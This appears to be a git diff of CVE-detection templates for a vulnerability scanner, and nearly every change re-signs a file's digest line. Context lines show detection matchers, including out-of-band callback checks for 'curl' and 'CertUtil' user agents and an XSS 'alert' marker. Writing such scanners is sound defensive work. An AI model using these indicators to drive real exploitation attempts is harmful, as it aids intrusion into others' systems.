a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 6350ef7ec3..6aef9abbdb 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -48,5 +48,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d1d5d257f583b48b6ce61718e437d6cca06f95bd3c7070c26595dc5993b62f47022100eb4bf86098ce1ec7a08c64dc7258366e9bc9e6ea665a8cfc65f3c778cf94909f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210083049b5c8c1ca6deb0f0ca3aea70e7655936bb0f6a754e82fa8ed89f9d82511b022100c86f62246075d550fb7627d77a2cb61d6cccf28994b6d728a904cde4c9b52fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1497.yaml b/http/cves/2021/CVE-2021-1497.yaml index b7bd727f22..1dd18757ce 100644 --- a/http/cves/2021/CVE-2021-1497.yaml +++ b/http/cves/2021/CVE-2021-1497.yaml @@ -61,5 +61,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" - -# digest: 4a0a00473045022023662b238b4c9fcdba75bbe6d4aafe9374c45700112a0e8273915dce2ecf7475022100daf68fb7720fa634f8816bc2c5d144eaaaccbeadc99a3355876253189b74afd4:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022039f4c1b43dc411f27dd747aac493ad23ad5ff943ef958fe5a72984e7fca9acc50220076539bc2e45cc78c7aaa2800a3380908593bd3671de3f8103ad3a32b00b1879:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1498.yaml b/http/cves/2021/CVE-2021-1498.yaml index 835e3fd3c8..33ca2fd41f 100644 --- a/http/cves/2021/CVE-2021-1498.yaml +++ b/http/cves/2021/CVE-2021-1498.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203d9cce58c8cd5a10a1a50068169548f0f6c08a4d09df4be327e5600d2a106d1d022100eca10d131bdb6d57d1d0ba361533d43d0e90b1129f20b7673c2f62a334868c59:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d91aa9ba60744e83e96b8f4f5fa4321ec12ceb004ff0ec5b09188f76275bc56e02204e26d02cb05d2552b0b61d1721eecfb07939e05fc510e628b4194e3c4ce67ae9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-1499.yaml b/http/cves/2021/CVE-2021-1499.yaml index 87cd73e523..089466d931 100644 --- a/http/cves/2021/CVE-2021-1499.yaml +++ b/http/cves/2021/CVE-2021-1499.yaml @@ -62,5 +62,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220513f9fb16801bef24219e1e78649fb70c3ee8c6c9fb80c0a31ec882ba456dc560220622e5e9278c04c46474883fad87d09ad394e0518e09a4cea69db604039d10d0c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200d49fb212f19c4c72c92177babca1a2e2885d5e8742afe815619732a8d295b9b022100bae6498f09f425798b12a373e984b0772321b5ff1489025d77c04db0f64cce41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20031.yaml b/http/cves/2021/CVE-2021-20031.yaml index 93727f3a4e..2cbb364112 100644 --- a/http/cves/2021/CVE-2021-20031.yaml +++ b/http/cves/2021/CVE-2021-20031.yaml @@ -45,5 +45,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202b0cd27164d3609a804b6557ad9149946c63426d5f07e36808045665a5dea24e022100e3e6c93ba5c7fd63be89315b787e0237188fa6815b49beb5f39c96006aa9b661:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220554917031713e84b92fcc26a9884a9c29605416fab92f6f791d995abf8728d83022033ece071599b48f85783d048ee789d076aca4fcf65d4f4c7817069868b5031a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20038.yaml b/http/cves/2021/CVE-2021-20038.yaml index fc8e6b108e..47190212ee 100644 --- a/http/cves/2021/CVE-2021-20038.yaml +++ b/http/cves/2021/CVE-2021-20038.yaml @@ -53,5 +53,4 @@ http: part: interactsh_request words: - "User-Agent: {{useragent}}" - -# digest: 4a0a0047304502205314b1030c22ff4dd1d4b947d51d6013eb459cbd180716a4d922fd0aeb1873e8022100a594240440832cbfd141511b97a8aa488e3d897cc95744f212dd8e4e4888a1ca:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200ba58d6e657146e490a3958de69c46b8b9d374e2b75468b9d195809600fc8b0c022010e8f36fd9de1d8c9ac242911e1c60a5575f08fcd6e6ca236d57c62877cbfa5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20091.yaml b/http/cves/2021/CVE-2021-20091.yaml index 5b15c22af1..95fffce4ca 100644 --- a/http/cves/2021/CVE-2021-20091.yaml +++ b/http/cves/2021/CVE-2021-20091.yaml @@ -58,5 +58,4 @@ http: regex: - 'base64\,(.*?)" border=' internal: true - -# digest: 4a0a0047304502204278508ccd0442c3ae56ff80cf67f7fdd15b9cb876543a2adee8be5321ff9835022100a45641f4b2ae5734bbd586bf12838dbea7465c2ce03aa451f783f82e360c9bb8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200c15468e93128528eb79523f2c33ed060f22bbf531e5e504ea25605edd4eff3102207df1951c6e6863bc1d1ed7922dad6f39fa092be38b7677dbb12644b500ad3dd9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20092.yaml b/http/cves/2021/CVE-2021-20092.yaml index 847fe8491a..25637bab7d 100644 --- a/http/cves/2021/CVE-2021-20092.yaml +++ b/http/cves/2021/CVE-2021-20092.yaml @@ -63,5 +63,4 @@ http: regex: - 'base64\,(.*?)" border=' internal: true - -# digest: 4a0a004730450221009c8a73116b239b248682d65cca0391e5249feafbdac4edd2242eccd1ab5d55000220595838461750e1a4d9c18e3dbeb090504b69a349b743ae811673ba9b5084cf3c:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022076ac5a97c03d954fec45c4e1e89add755ba928ef3cb5591cf029bc9072f5b30e02200749e97d8b8b81d042fc0e2d88605186d7fa3e99c55857eccdd34d74dfce0768:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20114.yaml b/http/cves/2021/CVE-2021-20114.yaml index 8054e985c0..1df009dcae 100644 --- a/http/cves/2021/CVE-2021-20114.yaml +++ b/http/cves/2021/CVE-2021-20114.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bcb53dd46e5fcb68c3e0df76edb854b518d9b2b3244df7dd0a5edd1fa2b7f6cd02201cf11a46dbce6e8f9e7e7f3bb5e9f894ae73feb6c75c55eae4ce675698075468:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220776d969ccc0563ff9b081b961009026edfc6505d5f2ebf98b06d0339e075c312022100b067d044e92a5c6b3923f3071258169ec4d44da45579b98ec6a480a46cc1f6c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20123.yaml b/http/cves/2021/CVE-2021-20123.yaml index d1dbda7d98..28e7496253 100644 --- a/http/cves/2021/CVE-2021-20123.yaml +++ b/http/cves/2021/CVE-2021-20123.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d7fb355b63838477af77c7eea5ffd33d182bc692a7a7afeb9f8e5ef59ddc830f022100cd0b3f5ced13ed81e778eb7309a90167f3e8dab190cab5a564ce23a2633df020:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100eb0e7cc12b50ef79c548beb9efdf95ceea0f0b1abeb988a80abbf7f03b8b58e302200d40c4da3895f3dee54fa37a1a6b15353d558e49be96c3f201807b3a09e2c508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20124.yaml b/http/cves/2021/CVE-2021-20124.yaml index 4c46eaffa4..30abc67e34 100644 --- a/http/cves/2021/CVE-2021-20124.yaml +++ b/http/cves/2021/CVE-2021-20124.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fac78c0060d1ec8fb9a25c3bba0427559e5de022d886fd4e9e7a0408eb3d84460220300321bb7c74119cb958a1cd3a1b9574e2e25d97527e65dfb8b79f99238e8a3b:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022046f80154e36b9c36dc61b5cbc91cf63919b391cb5118a869409d007de356a073022019e0569a4295de1230de8681af2a753fd4b8067a815c07720c49d3aa10914116:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20150.yaml b/http/cves/2021/CVE-2021-20150.yaml index 02f313f2ae..fbcc3350e2 100644 --- a/http/cves/2021/CVE-2021-20150.yaml +++ b/http/cves/2021/CVE-2021-20150.yaml @@ -60,5 +60,4 @@ http: regex: - '' part: body - -# digest: 4b0a00483046022100e6a283a268fb30d6f6043497604e5abf21daa4928f7299a8cd9cd0df89546cb4022100f51962723f89c9621d4031dd4ec7fe74ca7476d49cf4dc92e7fef649c485dbfd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210092358b966f9dbd66964d2c19a83029eb7ae7e4d8e26de3cb8b2ed808b586d3db022100925e0e0f40c5de9f09d2706878df69a256c8976abafe37fe7e1fbc83927318a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20158.yaml b/http/cves/2021/CVE-2021-20158.yaml index b06d67bb6c..6679016b54 100644 --- a/http/cves/2021/CVE-2021-20158.yaml +++ b/http/cves/2021/CVE-2021-20158.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206ec63fcb6a502815cfff9a0b6e71852c7fbdbcab1c04c27edb12cee261b608de022028757b69fdb4b9027b30b50ab8535731da0dd8ab80094faf06da52ad43904a9d:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022017218ab4505abea6eb207f861405d523261704e3f663deaa840e0ee3fd36c3a102205e6a48d6e0eee91a695d9de8040e570858ca65b16a9c99f2d3202813b1dfcd53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20167.yaml b/http/cves/2021/CVE-2021-20167.yaml index 828cb48526..c3e79aff4b 100644 --- a/http/cves/2021/CVE-2021-20167.yaml +++ b/http/cves/2021/CVE-2021-20167.yaml @@ -44,5 +44,4 @@ http: part: interactsh_request words: - "User-Agent: curl" - -# digest: 490a00463044022057a3f09c82903a9159d61daa48be0f49cc5737a1c81440065373f9a3015457e30220266a026a31f880d04bfb9f727a23b741149a0b3b9dafc3e7d0a3e9b0f8141197:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b6cba090cf0fd5f166533ceb31eefe53e06ff2e813552c2b3b0052fce4f26f6402206324f6fd56a435c7e76a0fa4bf1a1d427c2848825a30b9fe4075af52bd39a827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20323.yaml b/http/cves/2021/CVE-2021-20323.yaml index ee02e95ee0..40d3ef1acc 100644 --- a/http/cves/2021/CVE-2021-20323.yaml +++ b/http/cves/2021/CVE-2021-20323.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 400 - -# digest: 4b0a00483046022100bd382de809a4ca16929559e9db8a0148362e94a6279d5916af9a92a899a75fb4022100bf53b7a816054248969488c833068fc07d731b57b4925c3e6d68593486b1804c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210080377160f88a9e51a811de60fc9e443fec3c52980bd3389d5043b5c5b16adbb4022028c980d1b3531b5044875600ca629d43c44ea947e2f71290c6d3b8822b588a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-20792.yaml b/http/cves/2021/CVE-2021-20792.yaml index 81b7cae6af..70001835e0 100644 --- a/http/cves/2021/CVE-2021-20792.yaml +++ b/http/cves/2021/CVE-2021-20792.yaml @@ -59,5 +59,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100bbaa67332226cb5b3a0a53bb93cea4ee1cef7d50a288fd024f4cd100215fe861022019dbf0e809fb6b7ccb633fc0d9c3bd6413f783fc98fd95f3dbdde5b0e032e22f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220703d4fe6eee3c06f58a84bc62e1a14797ad3089a8ff3a5a4b78997a88800b18a022100d056db9b39a48335781c1cbc505871d366a09c554058985c3af1b8ce78cfabe7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21087.yaml b/http/cves/2021/CVE-2021-21087.yaml index 3c1f41948f..a907671dad 100644 --- a/http/cves/2021/CVE-2021-21087.yaml +++ b/http/cves/2021/CVE-2021-21087.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220157ea6bef263a1197ef8dffd8b594018331aa92d599ee79b0efdae9f369735e3022100a54e2a703e1dc164b16378a4ca8d33f4e6e4f5e1c5939b2dc8bdc244b53a7fc5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f7ba90d8b35d6d51e9d9ca35d10ff6ab25d4252b94a192b9397995e12337202b02201810bf8891a22d540d492c8e1eec326064d058c5ff0e69b5ee3127e33053290d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21234.yaml b/http/cves/2021/CVE-2021-21234.yaml index 6ad470813e..c534c0c230 100644 --- a/http/cves/2021/CVE-2021-21234.yaml +++ b/http/cves/2021/CVE-2021-21234.yaml @@ -53,5 +53,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and - -# digest: 4b0a00483046022100c99fd949f5aec3cbe8682d048a7d6c539a96fc32eeb84f5b1bcf3f67430d8bd402210083521454c132cb1312145458996353ecb8d996cbece434fb7c93db2806c2a9c0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e688528bc3dd5e2bd125152215ca27be17663ce252d28382e6c824f223c13d0a022100afee319f2615522664df6ea1eccc6e8bdfec1fc5d6c3b676b05911dbe6c39fc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21311.yaml b/http/cves/2021/CVE-2021-21311.yaml index 26928bbc13..a09bc48097 100644 --- a/http/cves/2021/CVE-2021-21311.yaml +++ b/http/cves/2021/CVE-2021-21311.yaml @@ -65,5 +65,4 @@ http: - type: status status: - 403 - -# digest: 4a0a00473045022100fddfd19b848b0dbdd1fe4e0d1b834cdbb78abd1ddb3c3667935b262b33cb2637022069ccd5e6ffe390cd1c981aa3da8d7a713eb06b8cd5664dfdae94eb38e748d0c6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210098f411c5f162f872b9515cf9f14cff079b66f0fd944e1a2fbc122c7d83a1465102206b2083bc6f2bc4ee8ccb87d06d4c6aad33d68b49c0beaeaacfa4a0af10b5c114:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21315.yaml b/http/cves/2021/CVE-2021-21315.yaml index 85ba08ff1a..c70dde5f0a 100644 --- a/http/cves/2021/CVE-2021-21315.yaml +++ b/http/cves/2021/CVE-2021-21315.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210084a171155b63a6323362257bc680eacc13f3f0d32b01542272fa2e40e772a31c022045181f5d2eb56bd8ab057c0597cc665a2d8d339b07af0520e441ea0dc564c9ea:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220272623e87df1f07a6e9a250734b925b145ae19ba36e2b8f0b7539de5201da8de022077766c4e6641e882cce0f42888af7d9227665c335418e8112905c2fad24ecc0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21345.yaml b/http/cves/2021/CVE-2021-21345.yaml index d07c18917b..7129647592 100644 --- a/http/cves/2021/CVE-2021-21345.yaml +++ b/http/cves/2021/CVE-2021-21345.yaml @@ -105,5 +105,4 @@ http: part: interactsh_request words: - "User-Agent: curl" - -# digest: 490a004630440220725cffd39bd5e5be63d9ae96f77f67ec1d10f983369d1edf7d1c4202c5e3541802203a225b3cc77e864a3eca784758d0cb9a8593559942a1024cc9621c15d9b3a1f0:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c8366583b534d8a884981d3c18d3d15ce1636c9114d2e26476ceaa88c4863efa022000fd19c7f49e61601086e88066be2f3c0691dae25d780fe8eb874fade5b9d539:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21389.yaml b/http/cves/2021/CVE-2021-21389.yaml index 61e63dfcc2..3241de8ab6 100644 --- a/http/cves/2021/CVE-2021-21389.yaml +++ b/http/cves/2021/CVE-2021-21389.yaml @@ -60,5 +60,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bd44dc7e3a8b7095675407375790a60b63e226d2296fdca1b1597370aa567bd3022100bd8e9034f2fd3deea2a4e99244b845441314429d0513cc168ddf8789dc985444:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a531c6cf085712c1514bdc040326ad554a5019e7b3f543602d5a5ea7f1b8469e0221009685880c23655e95e0c92f6ab6cbc5397ced67f795411875c38ad9e774942f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21402.yaml b/http/cves/2021/CVE-2021-21402.yaml index f3bce8851f..ac89862be5 100644 --- a/http/cves/2021/CVE-2021-21402.yaml +++ b/http/cves/2021/CVE-2021-21402.yaml @@ -51,5 +51,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206f058d75f3e7b6b80403cb9a1687ff00da294cc64eff562b30925af428139bd40220362d8dc420bcedc00eca494b72b520c3c2d713b6243f892ae6f00dc8d94f04e7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022006aee05484d3dcc3f835edd0e98dfbbc4ff33dbed11d534b0fc4e4f2c9485620022100f15caf917eed12275cf1e75b471a13289fdb61f09bb6e67a9e8e912163155f3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 82235a4e3b..557c434f97 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -41,5 +41,4 @@ http: - "has invalid value!" - '"status" : "400"' condition: and - -# digest: 490a0046304402202138d04449159d4b45b26b61ca720fa2047d44bf2b8f8057bd715cec9187418a022062625033d1a7947766a593aa7b3e1e73be430849c8583330b767afea9d2b847e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022057b89677847f38e541ae054fd8320c72a034b4cd97b7517b2898cfd077ae58460221009b19329987f12f150b35a30a28ca031c7cc6684660f79bf9f8affb2f6ba07245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index f74046564e..cfd00837c6 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -44,5 +44,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100c6ae67368dc7a424d0f9497ce5181adc406c7276d5cffcc07b284da6e26fc7090220563980067ded75ae0164e48521e8274d5ff15ea62668ed26c4b474badf41275b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ad311a8b8c6aadbe0d667774eb48e602ada92291ef9a0f549cc947fe0ab4c9230220601768e0f3841394bd11f192b708bcd493a10bb9c0644d1a492b267450ed7d23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21799.yaml b/http/cves/2021/CVE-2021-21799.yaml index cd97dd5000..3704e95d11 100644 --- a/http/cves/2021/CVE-2021-21799.yaml +++ b/http/cves/2021/CVE-2021-21799.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205bfe3c0aa50d1ac69ae564124a2f74af23e7ad885cd60f79c67cfea11f5dad270220016b795deeb026a221fbf2f1d7f8307e76f3737d579726193d1fe617e4bd17cb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220178814b737f076adb644ed2d6596a2806f5dc4738153d5554b9e72e24ba72a4102210091049334e041c959c71c249ed86d308de0a8b8fe9e629c4caf38a546b4913f8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21800.yaml b/http/cves/2021/CVE-2021-21800.yaml index 3053b497f5..c831cfc53d 100644 --- a/http/cves/2021/CVE-2021-21800.yaml +++ b/http/cves/2021/CVE-2021-21800.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220127fda5940b6ccd493d4a2833a9aa4dc1131eda073084568c677a3abe28ef5950221009c5836aff61124457387639666c5aaebe1d27cf968f7b58280d183100857a427:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f943c60516a89c1698370662138ab38d87fd1d9a43b35c6ad7bb8671250ac18602207cc34d83ca93aef9341b5e0196e0a739d1322501ce6fa4927a7e5ca6e9c52a7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 65f5426bf1..18990bc058 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206cf9bdfd179f27a37c485419d352affe256035ac6824f4e31c2a9dd247a63d35022052aed45bc40f9490413c1a870908ca14cb9f396e36d3eef2dcf375569806ed9f:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202ba9ca63b33e570c75796fb78159d1d58f43a596e89391ff5c2881bcb011328e022005989481639449f856174d02881ca3f41e12bdb72098383d8393e8e5bf20060b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21802.yaml b/http/cves/2021/CVE-2021-21802.yaml index 35936bdde4..41bbe3897b 100644 --- a/http/cves/2021/CVE-2021-21802.yaml +++ b/http/cves/2021/CVE-2021-21802.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203bf81500e0c38ab7112d4880358c73b5586aa974f110e08f5191a6310137ce72022074927f728cefaf05ec82b77662a6f422b19a10232c4507fc9311dea6a3e2581a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202bc3ab8da872c694e99163cc0fdda3e4f6f71d261e7eb652cf7507c1b8cef5db022100afe17e8ce950bbbc8830f69de4b5df81d89ede95be8595a1e89bf9a8b31d878e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21803.yaml b/http/cves/2021/CVE-2021-21803.yaml index c4c2c24e89..8133276580 100644 --- a/http/cves/2021/CVE-2021-21803.yaml +++ b/http/cves/2021/CVE-2021-21803.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203f5fc64d195e5a26fbf17a45f31b7ccb61a9ed5a8af9d540ac14451520c9219c02203a0ccbe4be548de61d92a758a93afacac2afe0e4150abcca159608580cacf9eb:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200d0a6a21a638b853ca0eecf995dfbda1b199d1edb0c334fde70e33a61d50b1460220790e46c904a94f2cc2b48ef3b193e901a9cce3f29477da7295134634f170ee6f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21816.yaml b/http/cves/2021/CVE-2021-21816.yaml index a713f3867b..d488a3c26a 100644 --- a/http/cves/2021/CVE-2021-21816.yaml +++ b/http/cves/2021/CVE-2021-21816.yaml @@ -42,5 +42,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022040ffe7e33b5b6c36b13fc7e148e5021b24c4ecc24fa98cfc1b4902d936b13b430220659b0c57ed9a9456953c6c52a169c8ddb889d8ae7f3f45bcfa8254e900962521:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c85a32a6746c526f54495429ee03b92f5fbecfba7894e7b36406bad7c3e5ab03022060d3bef96a22c7439978a6ca07f51eba38f8f5da6e6d985dea6474907a9baf5e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index d4776d87d6..d83561baa9 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -61,5 +61,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202c977d97e1a8028776037475a833ca9a93155e8bcb46da34582b82338b130b9f02207966c7b9da0f844b1bd02714fbbd15daac772e5808f6c3e5260320453ac9859e:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202813502a008e91f31897e93ab7c9a65dfb8ef50c9307524c1f57bbaf57f8df0b022066e12a887925018f104c97c64399b9e2530c528ef4134e097eaee1f4b76ec5aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index aab7adfd3d..71b94243f1 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -42,5 +42,4 @@ http: part: body words: - '{"result":{"isDisconnected":' - -# digest: 4b0a00483046022100d9822bc959228b52c5e43483ae567ff5f013335e83369f4b9f5cdcd294c83dd5022100c150a3fa936b1728ed58b1cd73b38d0fc7a12c3d07723a38e7b9c7375ab993da:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200f0ac689c7c819ceb54425c0ba5388b355cc885c3b12fc7ed423ceb1f887551a022100d99be29974ecbac1c324f5035cc11a4759ca981f846aca6e0fd2230e6f2cb8d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index a8063d2097..87e4832df4 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -47,5 +47,4 @@ http: - "contains(body_1, 'VMware vSphere')" - "content_length_2 == 0" condition: and - -# digest: 4a0a0047304502201aee6af12dec34d37b7e8ac0010b55bcb55aeee1da57c3cd649dd950483c4e9f0221008f8b8080ef71f59748b87b2a867cb30d9369d7fa131d23157ec2bb08a37d1f74:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ae2b7c6e5e873d7f9bfbf7707384644f85d66955e0ff7cc3ac18f7752bb40fdd022100a3667afeb980e66317ab2cc4c3293bf4e4fe2d3fb6876163fcaf3047cf6ee4e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index 415dddc929..23657d4321 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -43,5 +43,4 @@ http: part: interactsh_request regex: - 'curl|CertUtil' - -# digest: 4a0a0047304502203d213101668a69b2f6b83bbfd83902a96a5493d3d6bb4b9c79241c05f15ae9ec022100bec365e02627fc187bf394aeb51a8716ac3c3da124dc1588f1846bfb89d56644:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220119dbce7b1ddaad020754dc885702d5ea73e92ef03caff983e18ec440a0ccade022001ca129c50b00acc50ef3181cb0978eced5b97b3b399ae454b6b868ff36d58e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index 717e4d82d9..420f366e81 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220585f3a044959879a50453de9b9bebf158ef4f19de8ce5120c01124bc45f889ee0221008acc18c6d11d14c078a666b9d33f89af2e4d9e2906dbbd2364789c25c410477b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022070746acdb67aaa9e13213a43d91bab2f338b450d992cc51e987db48ae839658c0221008e59037fba2034374eaf4239781e51c9664887315d2461f969cd9a54f2f80eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 2bea5ffc32..2766bbe496 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -41,5 +41,4 @@ http: - "alert('document.domain')" - "No policy has been chosen." condition: and - -# digest: 4b0a00483046022100b089bd6d8822a1eafc5b91f753b61d6a07799833d05d44c53e1ea4b076bdb7360221009f1555be408bb57d0980507fb305830cfdb7197c81166bd8d35407b680e3df87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201a65f5c8e15e70c24ad58fa05f9678efb3e90738ddae790584ef234d8aa8f0ac02210096a198df9462fbf964393c87605625f10a61ae64cb676202db063e2e50de8c5b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 07a9f16756..5681bff5af 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -50,5 +50,4 